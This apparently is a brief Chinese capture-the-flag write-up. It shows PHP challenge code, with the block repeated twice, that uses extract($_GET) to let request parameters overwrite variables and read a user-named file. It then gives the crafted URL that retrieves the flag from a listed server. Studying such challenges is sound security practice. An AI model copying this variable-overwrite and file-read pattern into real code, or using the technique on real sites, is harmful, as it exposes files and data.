<?php
extract ( $_GET );
if (!empty( $ac ))
{
$f = trim ( file_get_contents ( $fn ));
if ( $ac === $f )
{
echo "<p>This is flag:" . " $flag </p>" ;
}
else
{
echo "<p>sorry!</p>" ;
}
}
extract ( $_GET );
if (!empty( $ac ))
{
$f = trim ( file_get_contents ( $fn ));
if ( $ac === $f )
{
echo "<p>This is flag:" . " $flag </p>" ;
}
else
{
echo "<p>sorry!</p>" ;
}
}
?>
根据题目的提示我们猜测目录下有txt文件,于是我们试出了http://120.24.86.145:8002/web8/flag.txt下有flags
于是根据题意构造得http://120.24.86.145:8002/web8/?ac=flags&fn=flag.txt
便得到flag
如有疑问请联系qq:834368404